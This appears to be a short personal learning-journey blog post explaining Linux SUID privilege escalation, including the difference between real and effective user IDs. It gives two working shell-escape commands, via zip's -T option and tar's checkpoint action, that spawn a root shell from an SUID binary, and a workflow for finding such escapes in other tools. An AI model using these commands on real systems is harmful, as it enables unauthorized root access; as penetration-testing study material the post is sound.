🛠️ The Mechanics: RUID vs. EUID
When you execute a SUID binary, two things happen:
- Real UID (RUID): Stays as your normal user (e.g., 1001). This is who you actually are.
-
Effective UID (EUID): Switches to the file owner (e.g., 0/Root). This is the power the system checks when you try to read
/etc/shadow.
Understanding this gap is key to knowing why a spawned shell from an SUID process becomes a Root Shell.
🔓 Beyond the Basics: Exploiting Complex Binaries
We often talk about find or vim, but today I audited tools that aren't obviously dangerous:
1. The zip Escape
The zip utility has a test feature (-T) that allows you to specify a command to use for unzipping.
The Exploit:
zip exploit.zip /etc/hosts -T --unzip-command="sh -c /bin/sh"
2. The tar Checkpoint
tar can execute commands at specific "checkpoints" during the archiving process.
The Exploit:
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
🕵️♂️ The Researcher's Workflow
When I encounter a binary that isn't on a standard cheat sheet, I use this workflow:
-
strings <binary>: Look for calls tosystem,exec, orsh. -
man <binary>: Search for terms like "command", "program", or "shell". - Check for interactive modes that might allow shell escapes (e.g.,
!sh).
Follow my journey: #1HourADayJourney
Top comments (0)